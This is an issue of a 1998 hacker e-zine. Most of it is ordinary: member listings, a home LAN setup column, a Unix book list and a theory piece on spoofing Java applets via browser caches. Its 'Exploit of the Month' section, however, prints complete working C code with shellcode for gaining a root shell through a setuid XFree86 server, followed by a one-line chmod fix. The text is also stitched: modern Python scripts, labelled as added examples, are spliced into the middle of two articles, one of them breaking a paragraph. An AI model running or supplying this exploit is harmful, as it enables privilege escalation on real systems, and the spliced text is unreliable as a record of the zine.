Computer Academic Underground
Electronic Magazine
#0016
0215.98

##############################################################################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
==============================================================================
------------------------------------------------------------------------------
..............................................................................

Table of Contents

Foreword

General
    Member Listing                              -= CAU =-
    817 2600 Meeting                            -= CAU =-
    Yep, It's Me Again                          Scion Kai
    Small LAN Administration                    Scion Kai
    I)ruid's Novice Corner                      I)ruid

Hacking
    Java Applet Spoofing                        I)ruid
    Exploit of the Month                        -= CAU =-

Phreaking

Closing

##############################################################################

Foreword

Hello everyone, and welcome to another month. This month, we have a return
from an old contributor, Scion Kai.

Also, I'd like to point out this month a site that I now frequent daily.
Slashdot.org is a techie-news site that is kept very up to date, and is not
moderated like the mainstream media. People can say what they want to say,
post articles, etc. Slashdot.org is a VERY good site, and I would definitely
recommend checking it out. The URL is "http://www.slashdot.org".
I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Member Listing
(In the order in which they were brought into the CAU)

Handle               IRC Nick       E-Mail
--------------------------------------------------------------
I)ruid               I}ruid         druid@caughq.org
Ultra Violet         uv_            uv@caughq.org
Crimson Assassin     Crimson_A      crimson@caughq.org
Fizban               Fizban^        fizban@caughq.org
Sublime              sublime        sublime@caughq.org
int3l                int3l          int3l@caughq.org
MajestiX             maJesTix       majestix@caughq.org
--------------------------------------------------------------

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

817 2600 Meeting

First Friday of Every Month
6:00pm until 9:00pm

Cafe Cybre
481 Harwood Road
Hurst, Texas
Phone: METRO: 817.268.0060

"Now with TCP/IP Technology!" (inside joke)

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Yep, It's Me Again

Well, hello everyone - it's your old buddy Scion Kai. Not that you really
care, but that's okay because I don't give a shit about you either. If any of
you remember, I used to do some articles for the zine back when it first
started - you know, just general stuff about how the net sucks and all that.
Don't worry - I'm pretty much through bitching for now. Yes, I know how much
that disappoints you all (well, most of you anyways), but don't worry; I'm
sure I'll see something soon that'll set me off. For now, I'm just glad to be
back after having spent the past year in seclusion.

I'd also like to point out that I'm quite happy that CAU dropped its
relationship with LiE [gagging sounds in background] finally. What a Load of
intestinal Excrements. (Score 1 for I)ruid. Yahoo.) Okay, so I'm bitter. I had
some issues with LiE, which is why I left in the first place for a while, but
that's all in the past (thankfully).
So here's to the good times, and I'll be coming back next month to bitch for a
while - I promise.

Scion Kai (losgann@pair.com)
Yeah, write to me - see if I care.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Small LAN Administration
(Or At Least My Idea Of It)

Since I didn't gripe about anything of merit in my article this month, I
figured I would contribute this as well. This'll be a little column (I might
continue it, I don't know) on my views on LAN administration. I base it on the
networks I'm building at home, so it'll be of most concern to people who are
interested in starting up a small LAN from scratch. I plan on covering mainly
administration and security, plus a little network cartography. Well, I don't
know, really - let's see what happens when I sit down and ramble on about
something useful rather than just sitting down and typing out garbage about
encryption philosophy and such. My network's of mixed platform, so I should
get to cover a lot of topics with it.

For starters, let me introduce you to my network at home:

  [ HP DeskJet 400 ]                                [ 28.8kbps modem to ISP ]
          |                                                   |
  [ Kiest, a Linux 2.0.30 box ] --- 10baseT hub --- [ Maeve, a Linux 2.0.30 box ]
          |                                                   |
      Arcnet hub                                    [ Saleem, a Mac PowerBook 520 ]
          |
  [ Branwen, an MS-DOS 6.21 box ]

I have some other boxes I'm working on, but they're not "officially" on my
network yet. The whole of it is TCP/IP v6 (IPng) based for future expansion,
but I use v4 addresses and encapsulation for compatibility. I only use IP v4
on the Arcnet portion since I have a DOS client on there (there aren't any
IP v6 clients for DOS to my knowledge).

Kiest is my main server. It's an Intel P75 with 24mb of RAM running Linux
2.0.30 (slackware-3.4 distribution, upgraded from slackware96). Kiest stores
about 90% of the files that are used on the network, including shared binaries
and home directories.
I prefer to use Samba (an SMB/LAN Manager server) in conjunction with NFS due
to the fact that there aren't any NFS clients for DOS or Windows that are worth
their salt. Kiest also acts as a password server of sorts. I considered using
NIS, but decided that NIS was not worth the security risks involved. Instead,
a main list of passwords is kept in the /etc/passwd (with Shadow installed) on
Kiest. To be able to access the SMB shares or NFS exports, users on the
workstations must enter their username and password to log in as it is on
Kiest, since I have user-level security enabled in the Samba configuration and
user-password verification is required for NFS anyway. This seemed to me to be
the best way to handle security on this small of a network, especially since
the SMB shares and NFS exports are the main focus of the network. Of course,
access to these services is limited to the local IP subnet, thus preventing
outsiders from mounting my local directory hierarchies.

Kiest also runs other server applications, such as Apache 1.2.4 (WWW),
BIND-8.1.1 (DNS), wu.ftpd (FTP), sendmail 3.4 (SMTP), and pop3d (POP2/3). I
plan on going into detail on setting up these servers in future articles.

Maeve is just a lowly 386DX-40 with 8mb of RAM that I use as a small server.
It's not an incredibly powerful machine, but it gets the job done and it takes
some of the CPU load off of Kiest. Essentially, all it does is start a basic
installation of Linux 2.0.30, then mount the /usr structure from NFS on Kiest.
It starts up BIND to supply primary DNS service for my local network, as well
as some other basic servers. I haven't completely decided what Maeve's role
will ultimately be on my network, but I'm experimenting.

Ah, then there's Saleem. Saleem is my notebook computer that I cart around.
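The access rule above for Kiest (NFS exports reachable only from the local IP subnet) is worth checking mechanically rather than by eye. The following is an added example, not part of Scion Kai's article or any CAU tool: it parses a Linux /etc/exports file and flags any export not confined to an assumed LAN of 192.168.1.0/24 (the article never gives its subnet), or that maps remote root to local root. The sample exports content is constructed.

```python
"""Audit /etc/exports against a 'local subnet only' policy (added example; LAN and sample are constructed)."""
import ipaddress
import re

LOCAL_SUBNET = ipaddress.ip_network("192.168.1.0/24")  # assumed LAN, not from the article

# A client entry is "host(options)", "host" or "(options)"; an empty host means everyone.
CLIENT_RE = re.compile(r"(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?")

def parse_exports(text):
    """Yield (path, host, options) for every client entry in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        if not clients:                               # bare path: world access, default options
            yield path, "", frozenset()
        for client in clients:
            m = CLIENT_RE.fullmatch(client)
            host = m.group("host") if m else client
            opts = (m.group("opts") or "") if m else ""
            yield path, host, frozenset(o for o in opts.split(",") if o)

def host_within_local_subnet(host):
    """True only for an explicit address or subnet inside LOCAL_SUBNET.
    Wildcards, netgroups and hostnames cannot be verified offline, so they count as unconfined;
    both 192.168.1.0/24 and 192.168.1.0/255.255.255.0 notations are accepted."""
    if not host or any(c in host for c in "*?@"):
        return False
    try:
        return ipaddress.ip_network(host, strict=False).subnet_of(LOCAL_SUBNET)
    except (ValueError, TypeError):                   # hostname, or a different address family
        return False

def audit_exports(text):
    """Return human-readable findings; an empty list means the policy holds."""
    findings = []
    for path, host, opts in parse_exports(text):
        label = host or "<everyone>"
        if not host_within_local_subnet(host):
            findings.append(f"{path}: {label} is not confined to {LOCAL_SUBNET}")
        if "no_root_squash" in opts:
            findings.append(f"{path}: {label} maps remote root to local root")
    return findings

SAMPLE_EXPORTS = """\
# constructed sample modelled on the article's file server
/usr      192.168.1.0/255.255.255.0(ro)
/home     192.168.1.0/24(rw)
/export   (rw)
/pub      *(ro)
/opt      192.168.1.5(rw,no_root_squash)
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run against the sample it reports three findings: the unrestricted /export and /pub lines, and the no_root_squash option on /opt.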
Most of the time it's not actually hooked into the network, but if I need to
access something on the network from it, I can just plug it in and then telnet
or FTP into Kiest or Maeve or wherever. It's just one of those convenience
things.

Then we get to the odd-ball part of my network. I have an Arcnet NIC in Kiest
which is hooked into an active hub and then to Branwen. Why the hell would
anyone want to use Arcnet, you ask? Simple: it's probably the single most
reliable network topology I've used. The flavor I prefer to use is a nice
comfortable 2.5mbps (not as fast as Ethernet, but not too slow either) and
implements RG-62U (90-something ohm) coax cables. Actually, I use 50 ohm
Ethernet coax cable on it. Arcnet is just that robust that it doesn't care if
I do some screwy things like that. It just plugs along as happy as a lark. In
fact, if I could afford the 100mbps Arcnet hardware, I wouldn't mind switching
my entire network to Arcnet just for that reliability factor.

Of course, that doesn't answer why I chose to mix Arcnet into my Ethernet
network. Well, two reasons: 1) I already had the stuff lying around so I might
as well use it; and 2) older computers seem to like it better than Ethernet.
Particularly, Branwen is a Tandy 1000TX, a 286 with 768kb of RAM. Really it's
just an experiment in network compatibility. The computer itself may not be
able to do much on its own, but it makes an excellent workstation for
telnetting into Kiest to do work there. It implements the simple Crynwr packet
drivers for the hardware and the ancient PC/IP software that I have no idea
who wrote.

Getting this setup to actually work took a few tries. The Linux kernel Arcnet
driver actually creates three different devices called arc0, arc0e, and arc0s
for different encapsulation methods and so forth. It took me a few tries to
figure out which one worked, and I found that arc0e seemed to work the best.
After that, it was only a simple routing procedure to get the bridging done
across Kiest from my Ethernet network to my Arcnet network.

Whew, that was a lot of information and I'm just skimming the surface. I think
I'll stop here for now - you have a basic idea of the architecture of my
network, and so I'll start to delve into the individual setup on each machine
and also the setup of different network servers in future articles. I have a
lot of writing to do. Let me know if this column actually interests anybody -
I'd hate to keep writing all this shit if nobody's going to read it. I know
this article probably wasn't all too informative in LAN administration, but
it's just an introduction; more specific stuff comes later. Also, if there's
anything specific you'd like to see me cover in an article, let me know and
I'll try and see if I can help you.

Scion Kai (losgann@pair.com)

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

I)ruid's Novice Corner:
Top 5 Books To Read To Learn General Unix (in my opinion)

All right, this month for my Novice Corner column, I thought I'd go over some
books that will definitely help you learn your way around and become familiar
with the general UNIX environment, and Linux in particular, as it is my current
favorite flavor of UNIX. I also threw in a few programming books for good
measure, because if you can't at least look at some C code and halfway
understand it, you need to be able to, and if you can't whip up a quick script
to perform basic functions, you need to be able to handle that task as well.
So now, on to the list:

1) UNIX IN A NUTSHELL - By O'Reilly & Associates

This was the first UNIX reference I bought when I was first introduced to the
UNIX environment, and it helped me out immensely. For starters, it has a
decent introduction, and an overview of most of the standard UNIX commands.
What I liked about this book was that it contained mini-references on a lot of
the various editors that can be found on various flavors of UNIX. Being
familiar with at least basic commands in EACH of these editors is definitely
very useful. Also in this book is an overview of various shells and how they
differ, and finally, it has a little information on software development and
programming. This is just a great general all-around UNIX book that will
definitely help the beginner.

2) THE LINUX BIBLE - From Yggdrasil Computing, Incorporated

This is probably the most useful and well compiled book I own. The Linux Bible
starts out with a general introduction and a few chapters on how to install
and set up a general Linux environment. After that it has a few sections on
general Systems Administration, Networking, and other such broad areas, and
from then on, it is a collection of HOWTOs to help the Linux user set up
specific software packages and features of his/her Linux system. This book has
been invaluable to me in respect to setting up my own Linux systems and the
CAUGHQ Local Area Network. I highly suggest getting this book at all cost. It
really is the most complete guide to installing, running and maintaining a
Linux system.

3) PRACTICAL C PROGRAMMING - By O'Reilly & Associates

I do not actually own this book, but I plan to soon. Currently I am borrowing
Sublime's copy. This book is a great introduction to the C programming
language in a UNIX environment. If you don't know basic C already, this book
will definitely get you started. Practical C Programming is a very thorough
guide to learning C; however, it is not set up as a reference book, it is
formatted as more of a textbook.

4) PROGRAMMING PERL - By O'Reilly & Associates

If you don't know how to whip up a quick Perl script, you are at a loss. This
is a great book to introduce you to basic scripting and get you going in Perl.
This book not only has a few chapters to teach you basic Perl, but also has a
reference section to help you along once you've gotten started. Being able to
script in Perl is probably the most important thing you can learn next to
coding in C, in my opinion, and this book will definitely help you with that.

5) E-ZINES - By Lots of People

I know this isn't a book, but E-Zines are part of the backbone of the hacker
community. When you have quality zines like Phrack, 2600 (even though it's not
electronic), and others, you can learn a LOT from them, and they are generally
slanted more towards the hacking aspect of UNIX rather than just the basics.

But anyway, that's my Novice Corner column for this month. How about a little
feedback? Is anyone actually learning anything from this column? Does anyone
actually find it useful? If I get some positive feedback, I will continue
doing a Novice Corner column every month, but otherwise, this will probably be
the last Novice Corner, and I'll concentrate my efforts elsewhere, maybe on
some more technically oriented articles, or maybe I'll actually find time to
code. But anyway, that's all for this month. Enjoy.

I)ruid

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Java Applet Spoofing
(Theory vs. Implementation)

First off, I will do a little explanation of the theory behind this, and let
you know a little bit about the limits of this theory due to the Java Security
API. This theory is based on the assumption that the web browser being used
will cache an applet when it first encounters it, and then use the cached
applet if the browser ever comes across an applet with the same name on a
different site. This is the case with Netscape Navigator 3.0 and older, and
Microsoft IE 3.0 and older.
I have not had the time to run some tests on the newer browsers or other
browsers, but I do know about these two browsers in particular.

The basic theory is, if you can cache your applet in the user's browser before
they encounter the applet you are spoofing, their browser will re-run your
applet instead of the applet it is supposed to be running. The easiest way to
cache your applet would be to find some way to delete all other applets in the
browser's cache, then have the browser load your applet. I have two theories
on how to do this. First, you could write an applet to delete the cache, but
this would be violating the Java Security API (no file deletion access), and
you would probably have to find some way to have an applet do this, because as
far as I know, it's not possible. The second theory is to fill up the cache so
that the browser forces itself to delete its old cache. This method is
implementable, but would probably take much longer than desired.

Once the cache is either deleted or contains no applets, you have the browser
load your applet, which has the same name as the applet you are going to
spoof. This requires you to have the browser load your applet, but not execute
the code which will be executed when you are actually spoofing the applet. The
best way to do this would be to have the applet check and see what site the
user is on, and have the applet exit if the browser is not on the correct
site. For example, let's say you wanted to spoof wheredoyouwanttogotoday.class
on www.microsoft.com. You would name your applet
'wheredoyouwanttogotoday.class' and have their browser load it. The applet
would then check and see if the substring "http://www.microsoft.com" is in the
current URL and if so, execute the code at that point. If the current URL does
not match the requirements, the applet would simply exit, causing your applet
to do absolutely nothing UNLESS it is actually running in place of the target
applet to spoof.
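The weakness this whole theory rests on is a cache keyed by the applet's class name alone, so an entry stored while visiting one site satisfies a request for a same-named class on another. The following is an added example (not from the article, and not the cache code of any real browser): a small Python model of the two keying policies, with constructed sites and applet bodies, showing that keying the cache on (origin of the class file, class name) is what removes the cross-site reuse.

```python
"""Applet cache keyed by class name alone versus by (origin, class name).
Added example with constructed sites and applet bodies; it models the two keying
policies only, not any real browser's cache."""
from urllib.parse import urljoin, urlsplit

# Constructed 'network': class-file URL -> the bytes each site actually serves.
SERVERS = {
    "http://site-a.example/applets/wheredoyouwanttogotoday.class": b"applet from site-a",
    "http://site-b.example/wheredoyouwanttogotoday.class": b"applet from site-b",
}

def download(url):
    """Stand-in for an HTTP fetch of the class file."""
    return SERVERS[url]

def origin_of(url):
    """(scheme, host, port) of a URL, with the port defaulted per scheme."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}[parts.scheme]
    return (parts.scheme, parts.hostname, port)

class NameKeyedCache:
    """Keyed by class name only: the behaviour the article attributes to old browsers."""
    def __init__(self):
        self.store = {}

    def key_for(self, class_url, class_name):
        return class_name                          # where the class came from is ignored

    def load(self, page_url, code_attr):
        """Resolve the applet's code attribute against the page URL; serve from cache on a key hit."""
        class_url = urljoin(page_url, code_attr)
        key = self.key_for(class_url, code_attr.rsplit("/", 1)[-1])
        if key not in self.store:
            self.store[key] = download(class_url)
        return self.store[key]

class OriginKeyedCache(NameKeyedCache):
    """Keyed by (origin of the class file, class name): a cached entry never crosses sites."""
    def key_for(self, class_url, class_name):
        return (origin_of(class_url), class_name)

def visit_sequence(cache):
    """Visit site-a, then site-b; return the applet bytes site-b's page ends up running."""
    cache.load("http://site-a.example/index.html", "applets/wheredoyouwanttogotoday.class")
    return cache.load("http://site-b.example/index.html", "wheredoyouwanttogotoday.class")

if __name__ == "__main__":
    print(visit_sequence(NameKeyedCache()))        # b'applet from site-a': stale entry reused
    print(visit_sequence(OriginKeyedCache()))      # b'applet from site-b': fetched from its own site
```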
Theoretically, the user should not even notice the applet running unless they
look down at the bottom of the browser and see it saying 'Starting Java' for
half a second while the applet loads and promptly exits. However, being as how
I know NO Java whatsoever other than a few little lines of code I've looked
over, I am not sure if this is feasible. I have heard that an applet may only
have access to information such as the current URL if it has come from the
site that is in the URL. However, if the browser believes the cached applet is
the same as the one being spawned from the current website, this should work.
However, if this design will not work, I'm sure there are other methods of
delaying an applet's full execution.

But anyway, by now you should get the general idea. I plan to write a followup
to this article sometime in the future either after I have learned enough Java
to implement and test this idea or I find someone who already knows Java who
is willing to play around with this. But for now, I have other things to do.

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Exploit of the Month

This exploit was contributed by Gothic and Morning Dawn
(http://www.morningdawn.org), to be put into consideration for exploit of the
month. Obviously we chose it. It's short, it's sweet, and it exploits suid
Xservers. Anyway, here it is:

----8<---- Snip Here ----8<----

/* XFree86 Server exploit for Intel x86 */
/* Have phun!! */
/* Feb. 4, 1998 */
/* Try 2 3 4 5 for OFFSET */
#define OFFSET 2

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LENCODE ( sizeof( Code ) )

char Code[] =
    "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
    "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
    "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
    "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
    "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
char *args[] = { "X", "-nolock", Display, NULL };

int main()
{
    dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
    __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
    memcpy( ptr + 4, ptr, 0x3fc );
    memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
    memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
    execve( "/usr/X11R6/bin/X", args, args + 3 );
    perror( "execve" );
    return 1;
}

----8<---- Snip Here ----8<----

Also sent was the fix, which is of course to remove the suid bit from your
Xserver (chmod -s /usr/X11R6/bin/YOUR_XSERVER) and such. Well, that's the
exploit for this month.

-= CAU =-

##############################################################################

Phreaking

##############################################################################

Closing

Yes, once again, NOTHING in the phreak section... I guess the people in this
area don't have much interest in phones anymore... but then again, there's not
much in the zine of anything else either. I guess everyone's too busy with
their personal lives lately to bother writing anything for the zine, let alone
actually DOING anything useful. Well, hopefully we'll have a better turnout
next month. Until then...
I)ruid

##############################################################################

Computer Academic Underground